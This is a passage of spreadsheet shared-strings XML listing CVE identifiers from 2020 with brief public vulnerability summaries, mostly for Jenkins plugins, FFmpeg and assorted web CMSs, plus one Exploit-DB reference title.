    <t>A CWE-125: Out-of-bounds read vulnerability exists in long_term_filter function in g729postfilter.c in FFmpeg 4.2.1 during computation of the denominator of pseudo-normalized correlation R'(0), that could result in disclosure of information.</t>
  </si>
  <si>
    <t>CVE-2020-20907</t>
  </si>
  <si>
    <t>MetInfo 7.0 beta is affected by a file modification vulnerability. Attackers can delete and modify ini files in app/system/language/admin/language_general.class.php and app/system/include/function/file.func.php.</t>
  </si>
  <si>
    <t>CVE-2020-20908</t>
  </si>
  <si>
    <t>Akaunting v1.3.17 was discovered to contain a stored cross-site scripting (XSS) vulnerability which allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the Company Name input field.</t>
  </si>
  <si>
    <t>CVE-2020-2091</t>
  </si>
  <si>
    <t>A missing permission check in Jenkins Amazon EC2 Plugin 1.47 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified URL within the AWS region using attacker-specified credentials IDs obtained through another method.</t>
  </si>
  <si>
    <t>CVE-2020-2092</t>
  </si>
  <si>
    <t>Jenkins Robot Framework Plugin 2.0.0 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks, allowing users with Job/Configure to have Jenkins parse crafted XML documents.</t>
  </si>
  <si>
    <t>CVE-2020-2093</t>
  </si>
  <si>
    <t>A cross-site request forgery vulnerability in Jenkins Health Advisor by CloudBees Plugin 3.0 and earlier allows attackers to send an email with fixed content to an attacker-specified recipient.</t>
  </si>
  <si>
    <t>CVE-2020-2094</t>
  </si>
  <si>
    <t>A missing permission check in Jenkins Health Advisor by CloudBees Plugin 3.0 and earlier allows attackers with Overall/Read permission to send a fixed email to an attacker-specific recipient.</t>
  </si>
  <si>
    <t>CVE-2020-20943</t>
  </si>
  <si>
    <t>A Cross-Site Request Forgery (CSRF) in /member/post.php?job=postnew&amp;step=post of Qibosoft v7 allows attackers to force victim users into arbitrarily publishing new articles via a crafted URL.</t>
  </si>
  <si>
    <t>CVE-2020-20944</t>
  </si>
  <si>
    <t>An issue in /admin/index.php?lfj=mysql&amp;action=del of Qibosoft v7 allows attackers to arbitrarily delete files.</t>
  </si>
  <si>
    <t>CVE-2020-20945</t>
  </si>
  <si>
    <t>A Cross-Site Request Forgery (CSRF) in /admin/index.php?lfj=member&amp;action=editmember of Qibosoft v7 allows attackers to arbitrarily add administrator accounts.</t>
  </si>
  <si>
    <t>CVE-2020-20946</t>
  </si>
  <si>
    <t>Qibosoft v7 contains a stored cross-site scripting (XSS) vulnerability in the component /admin/index.php?lfj=friendlink&amp;action=add.</t>
  </si>
  <si>
    <t>CVE-2020-20948</t>
  </si>
  <si>
    <t>An arbitrary file download vulnerability in jeecg v3.8 allows attackers to access sensitive files via modification of the "localPath" variable.</t>
  </si>
  <si>
    <t>CVE-2020-20949</t>
  </si>
  <si>
    <t>Bleichenbacher's attack on PKCS #1 v1.5 padding for RSA in STM32 cryptographic firmware library software expansion for STM32Cube (UM1924). The vulnerability can allow one to use Bleichenbacher's oracle attack to decrypt an encrypted ciphertext by making successive queries to the server using the vulnerable library, resulting in remote information disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-2095</t>
  </si>
  <si>
    <t>Jenkins Redgate SQL Change Automation Plugin 2.0.4 and earlier stored an API key unencrypted in job config.xml files on the Jenkins master where they could be viewed by users with Extended Read permission, or access to the master file system.</t>
  </si>
  <si>
    <t>CVE-2020-20950</t>
  </si>
  <si>
    <t>Bleichenbacher's attack on PKCS #1 v1.5 padding for RSA in Microchip Libraries for Applications 2018-11-26 All up to 2018-11-26. The vulnerability can allow one to use Bleichenbacher's oracle attack to decrypt an encrypted ciphertext by making successive queries to the server using the vulnerable library, resulting in remote information disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-20951</t>
  </si>
  <si>
    <t>In Pluck-4.7.10-dev2 admin background, a remote command execution vulnerability exists when uploading files.</t>
  </si>
  <si>
    <t>CVE-2020-2096</t>
  </si>
  <si>
    <t>Jenkins Gitlab Hook Plugin 1.4.2 and earlier does not escape project names in the build_now endpoint, resulting in a reflected XSS vulnerability.</t>
  </si>
  <si>
    <t>exploits/java/webapps/47927.txt</t>
  </si>
  <si>
    <t>Jenkins Gitlab Hook Plugin 1.4.2 - Reflected Cross-Site Scripting</t>
  </si>
  <si>
    <t>CVE-2020-2097</t>
  </si>
  <si>
    <t>Jenkins Sounds Plugin 0.5 and earlier does not perform permission checks in URLs performing form validation, allowing attackers with Overall/Read access to execute arbitrary OS commands as the OS user account running Jenkins.</t>
  </si>
  <si>
    <t>CVE-2020-20971</t>
  </si>
  <si>
    <t>Cross Site Request Forgery (CSRF) vulnerability in PbootCMS v2.0.3 via /admin.php?p=/User/index.</t>
  </si>
  <si>
    <t>CVE-2020-20975</t>
  </si>
  <si>
    <t>In \lib\admin\action\dataaction.class.php in Gxlcms v1.1, SQL Injection exists via the $filename parameter.</t>
  </si>
  <si>
    <t>CVE-2020-20977</t>
  </si>
  <si>
    <t>A stored cross site scripting (XSS) vulnerability in index.php/legend/6.html of UK CMS v1.1.10 allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the Comments section.</t>
  </si>
  <si>
    <t>CVE-2020-20979</t>
  </si>
  <si>
    <t>An arbitrary file upload vulnerability in the move_uploaded_file() function of LJCMS v4.3 allows attackers to execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2020-2098</t>
  </si>
  <si>
    <t>A cross-site request forgery vulnerability in Jenkins Sounds Plugin 0.5 and earlier allows attacker to execute arbitrary OS commands as the OS user account running Jenkins.</t>
  </si>
  <si>
    <t>CVE-2020-20981</t>
  </si>
  <si>
    <t>A SQL injection in the /admin/?n=logs&amp;c=index&amp;a=dolist component of Metinfo 7.0 allows attackers to access sensitive database information.</t>
  </si>
  <si>
    <t>CVE-2020-20982</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability in shadoweb wdja v1.5.1, allows attackers to execute arbitrary code and gain escalated privileges, via the backurl parameter to /php/passport/index.php.</t>
  </si>
  <si>
    <t>CVE-2020-20988</t>
  </si>
  <si>
    <t>A cross site scripting (XSS) vulnerability in the /domains/cost-by-owner.php component of Domainmod 4.13 allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the "or Expiring Between" parameter.</t>
  </si>
  <si>
    <t>CVE-2020-20989</t>
  </si>
  <si>
    <t>A cross-site request forgery (CSRF) in /admin/maintenance/ of Domainmod 4.13 allows attackers to arbitrarily delete logs.</t>
  </si>
  <si>
    <t>CVE-2020-2099</t>
  </si>
  <si>
    <t>Jenkins 2.213 and earlier, LTS 2.204.1 and earlier improperly reuses encryption key parameters in the Inbound TCP Agent Protocol/3, allowing unauthorized attackers with knowledge of agent names to obtain the connection secrets for those agents, which can be used to connect to Jenkins, impersonating those agents.</t>
  </si>
  <si>
    <t>CVE-2020-20990</t>
  </si>
  <si>
    <t>A cross site scripting (XSS) vulnerability in the /segments/edit.php component of Domainmod 4.13 allows attackers to execute arbitrary web scripts or HTML via the Segment Name parameter.</t>
  </si>
  <si>
    <t>CVE-2020-2100</t>
  </si>
  <si>
    <t>Jenkins 2.218 and earlier, LTS 2.204.1 and earlier was vulnerable to a UDP amplification reflection denial of service attack on port 33848.</t>
  </si>
  <si>
    <t>CVE-2020-21003</t>
  </si>
  <si>
    <t>Pbootcms v2.0.3 is vulnerable to Cross Site Scripting (XSS) via admin.php.</t>
  </si>
  <si>
    <t>CVE-2020-21005</t>
  </si>
  <si>
    <t>WellCMS 2.0 beta3 is vulnerable to File Upload. A user can log in to the CMS background and upload a picture. Because the upload file type is controllable, the user can modify the upload file type to get webshell.</t>
  </si>
  <si>
    <t>CVE-2020-2101</t>
  </si>
  <si>
    <t>Jenkins 2.218 and earlier, LTS 2.204.1 and earlier did not use a constant-time comparison function for validating connection secrets, which could potentially allow an attacker to use a timing attack to obtain this secret.</t>
  </si>
  <si>
    <t>CVE-2020-21012</t>
  </si>
  <si>
    <t>Sourcecodester Hotel and Lodge Management System 2.0 is vulnerable to unauthenticated SQL injection and can allow remote attackers to execute arbitrary SQL commands via the email parameter to the edit page for Customer, Room, Currency, Room Booking Details, or Tax Details.</t>
  </si>
  <si>
    <t>CVE-2020-21013</t>
  </si>
  <si>
    <t>emlog v6.0.0 contains a SQL injection via /admin/comment.php.</t>
  </si>
  <si>
    <t>CVE-2020-21014</t>
  </si>
  <si>
    <t>emlog v6.0.0 contains an arbitrary file deletion vulnerability in admin/plugin.php.</t>
  </si>
  <si>
    <t>CVE-2020-21016</t>
  </si>
  <si>
    <t>D-Link DIR-846 devices with firmware 100A35 allow remote attackers to execute arbitrary code as root via HNAP1/control/SetGuestWLanSettings.php.</t>
  </si>
  <si>
    <t>CVE-2020-2102</t>
  </si>
  <si>
    <t>Jenkins 2.218 and earlier, LTS 2.204.1 and earlier used a non-constant time comparison function when validating an HMAC.</t>
  </si>
  <si>
    <t>CVE-2020-2103</t>
  </si>
  <si>
    <t>Jenkins 2.218 and earlier, LTS 2.204.1 and earlier exposed session identifiers on a user's detail object in the whoAmI diagnostic page.</t>
  </si>
  <si>
    <t>CVE-2020-2104</t>
  </si>
  <si>
    <t>Jenkins 2.218 and earlier, LTS 2.204.1 and earlier allowed users with Overall/Read access to view a JVM memory usage chart.</t>
  </si>
  <si>
    <t>CVE-2020-21041</t>
  </si>
  <si>
    <t>Buffer Overflow vulnerability exists in FFmpeg 4.1 via apng_do_inverse_blend in libavcodec/pngenc.c, which could let a remote malicious user cause a Denial of Service</t>
  </si>
  <si>
    <t>CVE-2020-21046</t>
  </si>
  <si>
    <t>A local privilege escalation vulnerability was identified within the "luminati_net_updater_win_eagleget_com" service in EagleGet Downloader version 2.1.5.20 Stable. This issue allows authenticated non-administrative user to escalate their privilege and conduct code execution as a SYSTEM privilege.</t>
  </si>
  <si>
    <t>CVE-2020-21048</t>
  </si>
  <si>
    <t>An issue in the dither.c component of libsixel prior to v1.8.4 allows attackers to cause a denial of service (DOS) via a crafted PNG file.</t>
  </si>
  <si>
    <t>CVE-2020-21049</t>
  </si>
  <si>
    <t>An invalid read in the stb_image.h component of libsixel prior to v1.8.5 allows attackers to cause a denial of service (DOS) via a crafted PSD file.</t>
  </si>
  <si>
    <t>CVE-2020-2105</t>
  </si>
  <si>
    <t>REST API endpoints in Jenkins 2.218 and earlier, LTS 2.204.1 and earlier were vulnerable to clickjacking attacks.</t>
  </si>
  <si>
    <t>CVE-2020-21050</t>
  </si>
  <si>
    <t>Libsixel prior to v1.8.3 contains a stack buffer overflow in the function gif_process_raster at fromgif.c.</t>
  </si>
  <si>
    <t>CVE-2020-21053</t>
  </si>
  <si>
    <t>Cross Site Scriptiong (XSS) vulnerability exists in FusionPBX 4.5.7 allows remote malicious users to inject arbitrary web script or HTML via an unsanitized "query_string" variable in app\devices\device_imports.php.</t>
  </si>
  <si>
    <t>CVE-2020-21054</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability in FusionPBX 4.5.7 allows remote malicious users to inject arbitrary web script or HTML via an unsanitized "f" variable in app\vars\vars_textarea.php.</t>
  </si>
  <si>
    <t>CVE-2020-21055</t>
  </si>
  <si>
    <t>A Directory Traversal vulnerability exists in FusionPBX 4.5.7 allows malicoius users to rename any file of the system.via the (1) folder, (2) filename, and (3) newfilename variables in app\edit\filerename.php.</t>
  </si>
  <si>
    <t>CVE-2020-21056</t>
  </si>
  <si>
    <t>Directory Traversal vulnerability exists in FusionPBX 4.5.7, which allows a remote malicious user to create folders via the folder variale to app\edit\foldernew.php.</t>
  </si>
  <si>
    <t>CVE-2020-21057</t>
  </si>
  <si>
    <t>Directory Traversal vulnerability in FusionPBX 4.5.7, which allows a remote malicious user to delete folders on the system via the folder variable to app/edit/folderdelete.php.</t>
  </si>
  <si>
    <t>CVE-2020-2106</t>
  </si>
  <si>
    <t>Jenkins Code Coverage API Plugin 1.1.2 and earlier does not escape the filename of the coverage report used in its view, resulting in a stored XSS vulnerability exploitable by users able to change job configurations.</t>
  </si>
  <si>
    <t>CVE-2020-21066</t>
  </si>
  <si>
    <t>An issue was discovered in Bento4 v1.5.1.0. There is a heap-buffer-overflow in AP4_Dec3Atom::AP4_Dec3Atom at Ap4Dec3Atom.cpp, leading to a denial of service (program crash), as demonstrated by mp42aac.</t>
  </si>
  <si>
    <t>CVE-2020-2107</t>
  </si>
  <si>
    <t>Jenkins Fortify Plugin 19.1.29 and earlier stores proxy server passwords unencrypted in job config.xml files on the Jenkins master where they can be viewed by users with Extended Read permission, or access to the master file system.</t>
  </si>
  <si>
    <t>CVE-2020-2108</t>
  </si>
  <si>
    <t>Jenkins WebSphere Deployer Plugin 1.6.1 and earlier does not configure the XML parser to prevent XXE attacks which can be exploited by a user with Job/Configure permissions.</t>
  </si>
  <si>
    <t>CVE-2020-21081</t>
  </si>
  <si>
    <t>A cross-site request forgery (CSRF) in Maccms 8.0 causes administrators to add and modify articles without their knowledge via clicking on a crafted URL.</t>
  </si>
  <si>
    <t>CVE-2020-21082</t>
  </si>
  <si>
    <t>A cross-site scripting (XSS) vulnerability in the background administrator article management module of Maccms 8.0 allows attackers to steal administrator and user cookies via crafted payloads in the text fields for Chinese and English names.</t>
  </si>
  <si>
    <t>CVE-2020-21087</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) in X2Engine X2CRM v6.9 and older allows remote attackers to execute arbitrary code by injecting arbitrary web script or HTML via the "New Name" field of the "Rename a Module" tool.</t>
  </si>
  <si>
    <t>CVE-2020-21088</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) in X2engine X2CRM v7.1 and older allows remote attackers to obtain sensitive information by injecting arbitrary web script or HTML via the "First Name" and "Last Name" fields in "/index.php/contacts/create page"</t>
  </si>
  <si>
    <t>CVE-2020-2109</t>
  </si>
  <si>
    <t>Sandbox protection in Jenkins Pipeline: Groovy Plugin 2.78 and earlier can be circumvented through default parameter expressions in CPS-transformed methods.</t>
  </si>
  <si>
    <t>CVE-2020-2110</t>
  </si>
  <si>
    <t>Sandbox protection in Jenkins Script Security Plugin 1.69 and earlier could be circumvented during the script compilation phase by applying AST transforming annotations to imports or by using them inside of other annotations.</t>
  </si>
  <si>
    <t>CVE-2020-21101</t>
  </si>
  <si>
    <t>Cross Site Scriptiong vulnerabilityin Screenly screenly-ose all versions, including v1.8.2 (2019-09-25-Screenly-OSE-lite.img), in the 'Add Asset' page via manipulation of a 'URL' field, which could let a remote malicious user execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2020-2111</t>
  </si>
  <si>
    <t>Jenkins Subversion Plugin 2.13.0 and earlier does not escape the error message for the Project Repository Base URL field form validation, resulting in a stored cross-site scripting vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-2112</t>
  </si>
  <si>
    <t>Jenkins Git Parameter Plugin 0.9.11 and earlier does not escape the parameter name shown on the UI, resulting in a stored cross-site scripting vulnerability exploitable by users with Job/Configure permission.</t>
  </si>
  <si>
    <t>CVE-2020-21121</t>
  </si>
  <si>
    <t>Pligg CMS 2.0.2 contains a time-based SQL injection vulnerability via the $recordIDValue parameter in the admin_update_module_widgets.php file.</t>
  </si>
  <si>
    <t>CVE-2020-21122</t>
  </si>
  <si>
    <t>UReport v2.2.9 contains a Server-Side Request Forgery (SSRF) in the designer page which allows attackers to detect intranet device ports.</t>
  </si>
  <si>
    <t>CVE-2020-21124</t>
  </si>
  <si>
    <t>UReport 2.2.9 allows attackers to execute arbitrary code due to a lack of access control to the designer page.</t>
  </si>
  <si>
    <t>CVE-2020-21125</t>
  </si>
  <si>
    <t>An arbitrary file creation vulnerability in UReport 2.2.9 allows attackers to execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2020-21126</t>
  </si>
  <si>
    <t>MetInfo 7.0.0 contains a Cross-Site Request Forgery (CSRF) via admin/?n=admin&amp;c=index&amp;a=doSaveInfo.</t>
  </si>
  <si>
    <t>CVE-2020-21127</t>
  </si>
  <si>
    <t>MetInfo 7.0.0 contains a SQL injection vulnerability via admin/?n=logs&amp;c=index&amp;a=dodel.</t>
  </si>
  <si>
    <t>CVE-2020-2113</t>
  </si>
  <si>
    <t>Jenkins Git Parameter Plugin 0.9.11 and earlier does not escape the default value shown on the UI, resulting in a stored cross-site scripting vulnerability exploitable by users with Job/Configure permission.</t>
  </si>
  <si>
    <t>CVE-2020-21130</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability in HisiPHP 2.0.8 via the group name in addgroup.html.</t>
  </si>
  <si>
    <t>CVE-2020-21131</t>
  </si>
  <si>
    <t>SQL Injection vulnerability in MetInfo 7.0.0beta via admin/?n=language&amp;c=language_web&amp;a=doAddLanguage.</t>
  </si>
  <si>
    <t>CVE-2020-21132</t>
  </si>
  <si>
    <t>SQL Injection vulnerability in Metinfo 7.0.0beta in index.php.</t>
  </si>
  <si>
    <t>CVE-2020-21133</t>
  </si>
  <si>
    <t>SQL Injection vulnerability in Metinfo 7.0.0 beta in member/getpassword.php?lang=cn&amp;a=dovalid.</t>
  </si>
  <si>
    <t>CVE-2020-21139</t>
  </si>
  <si>
    <t>EC Cloud E-Commerce System v1.3 was discovered to contain a Cross-Site Request Forgery (CSRF) which allows attackers to arbitrarily add admin accounts via /admin.html?do=user&amp;act=add.</t>
  </si>
  <si>
    <t>CVE-2020-2114</t>
  </si>
  <si>
    <t>Jenkins S3 publisher Plugin 0.11.4 and earlier transmits configured credentials in plain text as part of the global Jenkins configuration form, potentially resulting in their exposure.</t>
  </si>
  <si>
    <t>CVE-2020-21141</t>
  </si>
  <si>
    <t>iCMS v7.0.15 was discovered to contain a Cross-Site Request Forgery (CSRF) via /admincp.php?app=members&amp;do=add.</t>
  </si>
  <si>
    <t>CVE-2020-21142</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerabilty in IPFire 2.23 via the IPfire web UI in the mail.cgi.</t>
  </si>
  <si>
    <t>CVE-2020-21146</t>
  </si>
  <si>
    <t>Feehi CMS 2.0.8 is affected by a cross-site scripting (XSS) vulnerability. When the user name is inserted as JavaScript code, browsing the post will trigger the XSS.</t>
  </si>
  <si>
    <t>CVE-2020-21147</t>
  </si>
  <si>
    <t>RockOA V1.9.8 is affected by a cross-site scripting (XSS) vulnerability which allows remote attackers to send malicious code to the administrator and execute JavaScript code, because webmain/flow/input/mode_emailmAction.php does not perform strict filtering.</t>
  </si>
  <si>
    <t>CVE-2020-2115</t>
  </si>
  <si>
    <t>Jenkins NUnit Plugin 0.25 and earlier does not configure the XML parser to prevent XML external entity (XXE) attacks.</t>
  </si>
  <si>
    <t>CVE-2020-2116</t>
  </si>
  <si>
    <t>A cross-site request forgery vulnerability in Jenkins Pipeline GitHub Notify Step Plugin 1.0.4 and earlier allows attackers to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.</t>
  </si>
  <si>
    <t>CVE-2020-21161</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability in Ruckus Wireless ZoneDirector 9.8.3.0.</t>
  </si>
  <si>
    <t>CVE-2020-2117</t>
  </si>
  <si>
    <t>A missing permission check in Jenkins Pipeline GitHub Notify Step Plugin 1.0.4 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.</t>
  </si>
  <si>
    <t>CVE-2020-21176</t>
  </si>
  <si>
    <t>SQL injection vulnerability in the model.increment and model.decrement function in ThinkJS 3.2.10 allows remote attackers to execute arbitrary SQL commands via the step parameter.</t>
  </si>
  <si>
    <t>CVE-2020-21179</t>
  </si>
  <si>
    <t>Sql injection vulnerability in koa2-blog 1.0.0 allows remote attackers to Injecting a malicious SQL statement via the name parameter to the signin page.</t>
  </si>
  <si>
    <t>CVE-2020-2118</t>
  </si>
  <si>
    <t>A missing permission check in Jenkins Pipeline GitHub Notify Step Plugin 1.0.4 and earlier in form-related methods allowed users with Overall/Read access to enumerate credentials ID of credentials stored in Jenkins.</t>
  </si>
  <si>
    <t>CVE-2020-21180</t>
  </si>
  <si>
    <t>Sql injection vulnerability in koa2-blog 1.0.0 allows remote attackers to Injecting a malicious SQL statement via the name parameter to the signup page.</t>
  </si>
  <si>
    <t>CVE-2020-2119</t>
  </si>
  <si>
    <t>Jenkins Azure AD Plugin 1.1.2 and earlier transmits configured credentials in plain text as part of the global Jenkins configuration form, potentially resulting in their exposure.</t>
  </si>
  <si>
    <t>CVE-2020-2120</t>
  </si>
  <si>
    <t>Jenkins FitNesse Plugin 1.30 and earlier does not configure the XML parser to prevent XML external entity (XXE) attacks.</t>
  </si>
  <si>
    <t>CVE-2020-2121</t>
  </si>
  <si>
    <t>Jenkins Google Kubernetes Engine Plugin 0.8.0 and earlier does not configure its YAML parser to prevent the instantiation of arbitrary types, resulting in a remote code execution vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-2122</t>
  </si>
  <si>
    <t>Jenkins Brakeman Plugin 0.12 and earlier did not escape values received from parsed JSON files when rendering them, resulting in a stored cross-site scripting vulnerability exploitable by users able to control the Brakeman post-build step input data.</t>
  </si>
  <si>
    <t>CVE-2020-21224</t>
  </si>
  <si>
    <t>A Remote Code Execution vulnerability has been found in Inspur ClusterEngine V4.0. A remote attacker can send a malicious login packet to the control server</t>
  </si>
  <si>
    <t>CVE-2020-21228</t>
  </si>
  <si>
    <t>JIZHICMS 1.5.1 contains a cross-site scripting (XSS) vulnerability in the component /user/release.html, which allows attackers to arbitrarily add an administrator cookie.</t>
  </si>
  <si>
    <t>CVE-2020-2123</t>
  </si>
  <si>
    <t>Jenkins RadarGun Plugin 1.7 and earlier does not configure its YAML parser to prevent the instantiation of arbitrary types, resulting in a remote code execution vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-21236</t>
  </si>
  <si>
    <t>A vulnerability in /damicms-master/admin.php?s=/Article/doedit of DamiCMS v6.0 allows attackers to compromise and impersonate user accounts via obtaining a user's session cookie.</t>
  </si>
  <si>
    <t>CVE-2020-21237</t>
  </si>
  <si>
    <t>An issue in the user login box of LJCMS v1.11 allows attackers to hijack user accounts via brute force attacks.</t>
  </si>
  <si>
    <t>CVE-2020-21238</t>
  </si>
  <si>
    <t>An issue in the user login box of CSCMS v4.0 allows attackers to hijack user accounts via brute force attacks.</t>
  </si>
  <si>
    <t>CVE-2020-2124</t>
  </si>
  <si>
    <t>Jenkins Dynamic Extended Choice Parameter Plugin 1.0.1 and earlier stores a password unencrypted in job config.xml files on the Jenkins master where it can be viewed by users with Extended Read permission, or access to the master file system.</t>
  </si>
  <si>
    <t>CVE-2020-21244</t>
  </si>
  <si>
    <t>An issue was discovered in FrontAccounting 2.4.7. There is a Directory Traversal vulnerability that can empty folder via admin/inst_lang.php.</t>
  </si>
  <si>
    <t>CVE-2020-2125</t>
  </si>
  <si>
    <t>Jenkins Debian Package Builder Plugin 1.6.11 and earlier stores a GPG passphrase unencrypted in its global configuration file on the Jenkins master where it can be viewed by users with access to the master file system.</t>
  </si>
  <si>
    <t>CVE-2020-21250</t>
  </si>
  <si>
    <t>CSZ CMS v1.2.4 was discovered to contain an arbitrary file upload vulnerability in the component /core/MY_Security.php.</t>
  </si>
  <si>
    <t>CVE-2020-2126</t>
  </si>
  <si>
    <t>Jenkins DigitalOcean Plugin 1.1 and earlier stores a token unencrypted in the global config.xml file on the Jenkins master where it can be viewed by users with access to the master file system.</t>
  </si>
  <si>
    <t>CVE-2020-21266</t>
  </si>
  <si>
    <t>Broadleaf Commerce 5.1.14-GA is affected by cross-site scripting (XSS) due to a slow HTTP post vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-2127</t>
  </si>
  <si>
    <t>Jenkins BMC Release Package and Deployment Plugin 1.1 and earlier stores credentials unencrypted in its global configuration file on the Jenkins master where they can be viewed by users with access to the master file system.</t>
  </si>
  <si>
    <t>CVE-2020-2128</t>
  </si>
  <si>
    <t>Jenkins ECX Copy Data Management Plugin 1.9 and earlier stores a password unencrypted in job config.xml files on the Jenkins master where it can be viewed by users with Extended Read permission, or access to the master file system.</t>
  </si>
  <si>
    <t>CVE-2020-2129</t>
  </si>
  <si>
    <t>Jenkins Eagle Tester Plugin 1.0.9 and earlier stores a password unencrypted in its global configuration file on the Jenkins master where it can be viewed by users with access to the master file system.</t>
  </si>
  <si>
    <t>CVE-2020-2130</t>
  </si>
  <si>
    <t>Jenkins Harvest SCM Plugin 0.5.1 and earlier stores a password unencrypted in its global configuration file on the Jenkins master where it can be viewed by users with access to the master file system.</t>
  </si>
  <si>
    <t>CVE-2020-2131</t>
  </si>
  <si>
    <t>Jenkins Harvest SCM Plugin 0.5.1 and earlier stores passwords unencrypted in job config.xml files on the Jenkins master where they can be viewed by users with Extended Read permission, or access to the master file system.</t>
  </si>
  <si>
    <t>CVE-2020-21316</t>
  </si>
  <si>
    <t>A Cross-site scripting (XSS) vulnerability exists in the comment section in ZrLog 2.1.3, which allows remote attackers to inject arbitrary web script and stolen administrator cookies via the nickname parameter and gain access to the admin panel.</t>
  </si>
  <si>
    <t>CVE-2020-2132</t>
  </si>
  <si>
    <t>Jenkins Parasoft Environment Manager Plugin 2.14 and earlier stores a password unencrypted in job config.xml files on the Jenkins master where it can be viewed by users with Extended Read permission, or access to the master file system.</t>
  </si>
  <si>
    <t>CVE-2020-21321</t>
  </si>
  <si>
    <t>emlog v6.0 contains a Cross-Site Request Forgery (CSRF) via /admin/link.php?action=addlink, which allows attackers to arbitrarily add articles.</t>
  </si>
  <si>
    <t>CVE-2020-21322</t>
  </si>
  <si>
    <t>An arbitrary file upload vulnerability in Feehi CMS v2.0.8 and below allows attackers to execute arbitrary code via a crafted PHP file.</t>
  </si>
  <si>
    <t>CVE-2020-2133</t>
  </si>
  <si>
    <t>Jenkins Applatix Plugin 1.1 and earlier stores a password unencrypted in job config.xml files on the Jenkins master where it can be viewed by users with Extended Read permission, or access to the master file system.</t>
  </si>
  <si>
    <t>CVE-2020-21333</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability in PublicCMS 4.0 to get an admin cookie when the Administrator reviews submit case.</t>
  </si>
  <si>
    <t>CVE-2020-2134</t>
  </si>
  <si>
    <t>Sandbox protection in Jenkins Script Security Plugin 1.70 and earlier could be circumvented through crafted constructor calls and crafted constructor bodies.</t>
  </si>
  <si>
    <t>CVE-2020-21342</t>
  </si>
  <si>
    <t>Insecure permissions issue in zzcms 201910 via the reset any user password in /one/getpassword.php.</t>
  </si>
  <si>
    <t>CVE-2020-21345</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability in Halo 1.1.3 via post publish components in the manage panel, which lets a remote malicious user execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2020-2135</t>
  </si>
  <si>
    <t>Sandbox protection in Jenkins Script Security Plugin 1.70 and earlier could be circumvented through crafted method calls on objects that implement GroovyInterceptable.</t>
  </si>
  <si>
    <t>CVE-2020-21353</t>
  </si>
  <si>
    <t>A stored cross site scripting (XSS) vulnerability in /admin/snippets.php of GetSimple CMS 3.4.0a allows attackers to execute arbitrary web scripts or HTML via crafted payload in the Edit Snippets module.</t>
  </si>
  <si>
    <t>CVE-2020-21356</t>
  </si>
  <si>
    <t>An information disclosure vulnerability in upload.php of PopojiCMS 1.2 leads to physical path disclosure of the host when 'name = "file" is deleted during file uploads.</t>
  </si>
  <si>
    <t>CVE-2020-21357</t>
  </si>
  <si>
    <t>A stored cross site scripting (XSS) vulnerability in /admin.php?mod=user&amp;act=addnew of PopojiCMS 1.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the E-Mail field.</t>
  </si>
  <si>
    <t>CVE-2020-21358</t>
  </si>
  <si>
    <t>A cross site request forgery (CSRF) in Wage-CMS 1.5.x-dev allows attackers to arbitrarily add users.</t>
  </si>
  <si>
    <t>CVE-2020-21359</t>
  </si>
  <si>
    <t>An arbitrary file upload vulnerability in the Template Upload function of Maccms10 allows attackers bypass the suffix whitelist verification to execute arbitrary code via adding a character to the end of the uploaded file's name.</t>
  </si>
  <si>
    <t>CVE-2020-2136</t>
  </si>
  <si>
    <t>Jenkins Git Plugin 4.2.0 and earlier does not escape the error message for the repository URL for Microsoft TFS field form validation, resulting in a stored cross-site scripting vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-21362</t>
  </si>
  <si>
    <t>A cross site scripting (XSS) vulnerability in the background search function of Maccms10 allows attackers to execute arbitrary web scripts or HTML via the 'wd' parameter.</t>
  </si>
  <si>
    <t>CVE-2020-21363</t>
  </si>
  <si>
    <t>An arbitrary file deletion vulnerability exists within Maccms10.</t>
  </si>
  <si>
    <t>CVE-2020-21365</t>
  </si>
  <si>
    <t>Directory traversal vulnerability in wkhtmltopdf through 0.12.5 allows remote attackers to read local files and disclose sensitive information via a crafted html file running with the default configurations.</t>
  </si>
  <si>
    <t>CVE-2020-2137</t>
  </si>
  <si>
    <t>Jenkins Timestamper Plugin 1.11.1 and earlier does not sanitize HTML formatting of its output, resulting in a stored XSS vulnerability exploitable by attackers with Overall/Administer permission.</t>
  </si>
  <si>
    <t>CVE-2020-21377</t>
  </si>
  <si>
    <t>SQL injection vulnerability in yunyecms V2.0.1 via the selcart parameter.</t>
  </si>
  <si>
    <t>CVE-2020-21378</t>
  </si>
  <si>
    <t>SQL injection vulnerability in SeaCMS 10.1 (2020.02.08) via the id parameter in an edit action to admin_members_group.php.</t>
  </si>
  <si>
    <t>CVE-2020-2138</t>
  </si>
  <si>
    <t>Jenkins Cobertura Plugin 1.15 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.</t>
  </si>
  <si>
    <t>CVE-2020-21386</t>
  </si>
  <si>
    <t>A Cross-Site Request Forgery (CSRF) in the component admin.php/admin/type/info.html of Maccms 10 allows attackers to gain administrator privileges.</t>
  </si>
  <si>
    <t>CVE-2020-21387</t>
  </si>
